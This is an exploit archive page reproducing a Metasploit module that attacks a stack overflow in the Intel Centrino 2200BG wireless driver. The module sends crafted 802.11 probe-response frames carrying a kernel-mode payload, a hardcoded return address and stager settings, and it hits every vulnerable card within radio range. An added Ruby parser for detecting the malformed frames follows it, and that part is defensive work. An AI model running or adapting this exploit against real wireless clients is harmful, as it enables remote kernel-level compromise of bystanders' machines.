intelcentrino-overflow.txt

17 Apr 2008 00:00:00 | Reported by Giuseppe Gottardi | Type: packetstorm | Source: packetstormsecurity.com

Stack overflow in Intel Centrino 2200BG Wireless Driver allows remote code execution in kernel mode triggered by a specific probe response frame

Code
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Exploits::Windows::Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote

  include Exploit::Lorcon
  include Exploit::KernelMode

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Intel Centrino 2200BG Wireless Driver Probe Overflow',
      'Description' => %q{
        This module exploits a stack overflow in the w22n51.sys driver provided
        with the Intel 2200BG integrated wireless adapter. This stack overflow
        allows remote code execution in kernel mode. The stack overflow is triggered
        when a 802.11 Probe response frame is received that contains multi vendor specific tag
        and "\x00" as essid and essid length element. This exploit was tested with version 8.0.12.20000
        of the driver and an Intel Centrino 2200BG integrated wireless adapter. Newer
        versions of the w22n51.sys driver are provided from Intel to resolve this flaw.
        Since this vulnerability is exploited via probe response frames, all cards within
        range of the attack will be affected.

        Vulnerable clients don't need to have their card in a particular state for this exploit
        to work.

        This module depends on the Lorcon library and only works on the Linux platform
        with a supported wireless card. Please see the Ruby Lorcon documentation
        (external/ruby-lorcon/README) for more information.
      },

      'Author'      =>
        [
          'oveRet \'Giuseppe Gottardi\' <overet [at] securitydate.it', # exploit dev
          'skape'                                                      # windows kernel ninjitsu
        ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 4529 $',
      'References'  =>
        [
          ['URL', 'http://www.kb.cert.org/vuls/id/524332'],
          ['URL', 'http://www.milw0rm.org/exploits/3158'],
          ['URL', 'http://overet.securitydate.it/stuff/2200BG_8.0.12.20000_drivers.zip']
        ],
      'Privileged'  => true,

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },

      'Payload'     =>
        {
          'Space' => 224
        },
      'Platform'    => 'win',
      'Targets'     =>
        [
          # Windows XP SP2
          # 5.1.2600 (xpsp_sp2_gdr.070227-2254)
          [ 'Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000',
            {
              'Ret'      => 0x8054eb62,
              'Platform' => 'win',
              'Payload'  =>
                {
                  'ExtendedOptions' =>
                    {
                      'Stager'           => 'sud_syscall_hook', # don't change this
                      'PrependUser'      => "\xeb\x02" +        # required jump
                                            "\x85\xe0",         # fixed max len
                      'Recovery'         => 'idlethread_restart',
                      'KiIdleLoopAddress' => 0x804dbb27,
                    }
                }
            }
          ]
        ],

      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('ADDR_DST', [ true, "The MAC address to send this to", 'FF:FF:FF:FF:FF:FF']),
        OptInt.new('RUNTIME',     [ true, "The number of time to run the attack", 1000]),
        OptInt.new('DELAY',       [ true, "The number of seconds to sleep between the packets", 1]),
      ], self.class)
  end

  def exploit
    open_wifi

    rtime = datastore['RUNTIME'].to_i
    dtime = datastore['DELAY'].to_i
    count = 0

    print_status("Sending probe exploit to #{datastore['ADDR_DST']}...")
    print "[-] "

    while (count < rtime)
      wifi.write(create_beacon)
      select(nil, nil, nil, 0.10) if (count % 100 == 0)
      count += 1
      # Exit if we get a session
      break if session_created?

      print "#"
      sleep(dtime)
    end

    print "\n"
    print_status("Completed sending probe.")
  end

  def create_beacon
    bssid = ("\x43" * 6)
    src   = ("\x43" * 6)
    seq   = [rand(255)].pack('n')

    fill = 0xe0 - (payload.encoded.length - 125)

    frame =
      "\x50" +                       # type/subtype
      "\x00" +                       # flags
      "\x3a\x01" +                   # duration
      eton(datastore['ADDR_DST']) +  # dst
      src +                          # src
      bssid +                        # bssid
      seq +                          # seq
      rand_text(8) +                 # timestamp value
      "\xa0\x0f" +                   # beacon interval
      "\x31\x08" +                   # capability flags

      # ssid tag
      "\x00\x00" +

      # supported rates
      "\x01" + "\x01" + "\x82" +

      # current channel
      "\x03" + "\x01" + channel.chr +

      # fixed max len
      "\x85\x7b" +

      payload.encoded +

      # fill to reach e0 length
      ("\x41" * fill) +

      # vendor specific tag
      "\xdd" +
      "\x18" +
      "\x00\x50\xf2\x02\x01\x01\x89\x00\x03\xa5\x00\x00\x27\xa5\x00\x00" +
      "\x42\x54\xbc\x00\x62\x43\x66\x00" +

      # vendor specific tag
      "\xdd" +
      "\x10" +
      "\x00\x50\xf2\x05\x00\x01\x00\x04\x00\x00\x83\x07" +

      # RET address
      [target['Ret']].pack('V')

    return frame
  end
end
end
```
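The module's description names the frame layout that triggers the bug: a probe response whose SSID element has length 0, more than one vendor-specific (0xdd) element, and the element 0x85 (labelled "fixed max len" in the module) carrying an oversized body. The following Ruby is an added example, not part of the module above or of the Metasploit project: a small parser for the tagged-parameter section of an 802.11 probe response that reports those traits, the kind of check a wireless IDS would run over captured management frames. The sample frames are constructed here (no payload or return address), and the 30-byte ceiling for element 0x85 is an assumed baseline to adjust against real captures.

```ruby
# Added detection example (not the module's own code). Parses the
# information elements of an 802.11 probe response and reports the
# malformed layout described in the module's description.

MGMT_HDR_LEN       = 24   # frame control(2) + duration(2) + addr1..addr3(18) + sequence(2)
PROBE_RESP_FIXED   = 12   # timestamp(8) + beacon interval(2) + capability info(2)
IE_SSID            = 0x00
IE_VENDOR_SPECIFIC = 0xdd
IE_FIXED_MAX_LEN   = 0x85 # the element the module labels "fixed max len"
FIXED_MAX_BODY     = 30   # assumed ceiling for a well-formed element of this id

# A probe response has type/subtype byte 0x50 and at least header + fixed fields.
def probe_response?(frame)
  frame.bytesize >= MGMT_HDR_LEN + PROBE_RESP_FIXED && frame.getbyte(0) == 0x50
end

# Walk the [id, length, body] elements after the fixed fields.
# Returns [[id, body], ...]; an element whose declared length runs past the
# end of the frame is recorded as [:truncated, id] and ends the walk.
def parse_ies(frame)
  ies = []
  pos = MGMT_HDR_LEN + PROBE_RESP_FIXED
  while pos < frame.bytesize
    id  = frame.getbyte(pos)
    len = frame.getbyte(pos + 1)
    if len.nil? || pos + 2 + len > frame.bytesize
      ies << [:truncated, id]
      break
    end
    ies << [id, frame.byteslice(pos + 2, len)]
    pos += 2 + len
  end
  ies
end

# Return the list of traits that match the described trigger; empty for a
# frame that is not a probe response or looks well formed.
def suspicious_reasons(frame)
  return [] unless probe_response?(frame)
  ies = parse_ies(frame)
  reasons = []
  ies.each do |id, body|
    case id
    when :truncated # here `body` holds the offending element id
      reasons << format('element 0x%02x declares a length past the end of the frame', body)
    when IE_SSID
      reasons << 'SSID element with length 0' if body.bytesize.zero?
    when IE_FIXED_MAX_LEN
      if body.bytesize > FIXED_MAX_BODY
        reasons << format('element 0x85 with %d-byte body (expected at most %d)',
                          body.bytesize, FIXED_MAX_BODY)
      end
    end
  end
  vendor = ies.count { |id, _| id == IE_VENDOR_SPECIFIC }
  reasons << "#{vendor} vendor-specific elements" if vendor > 1
  reasons
end

# Constructed sample frames: a 24-byte management header (broadcast dst,
# placeholder src/bssid) followed by the 12 fixed probe-response bytes.
def build_probe_response(ies)
  hdr   = "\x50\x00" + "\x3a\x01" + ("\xff" * 6) + ("\x43" * 6) + ("\x43" * 6) + "\x00\x00"
  fixed = ("\x00" * 8) + "\x64\x00" + "\x31\x08"
  (hdr + fixed + ies).b
end

BENIGN_IES    = "\x00\x04home" + "\x01\x01\x82" + "\x03\x01\x06"
SUSPECT_IES   = "\x00\x00" + "\x01\x01\x82" + "\x03\x01\x06" +
                "\x85\x7b" + ("\x41" * 0x7b) +
                "\xdd\x03\x00\x50\xf2" + "\xdd\x03\x00\x50\xf2"
TRUNCATED_IES = "\x00\x00" + "\x85\x7b" + ("\x41" * 4)

if __FILE__ == $0
  { 'benign' => BENIGN_IES, 'suspect' => SUSPECT_IES, 'truncated' => TRUNCATED_IES }.each do |name, ies|
    puts "#{name}: #{suspicious_reasons(build_probe_response(ies)).inspect}"
  end
end
```

Any single trait on its own is weak evidence (an empty SSID element is normal in some probe responses), so a deployment would score the combination rather than alert on one hit; the truncated-element check matters because a driver parsing a declared length past the frame end is exactly the class of bug the module targets.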
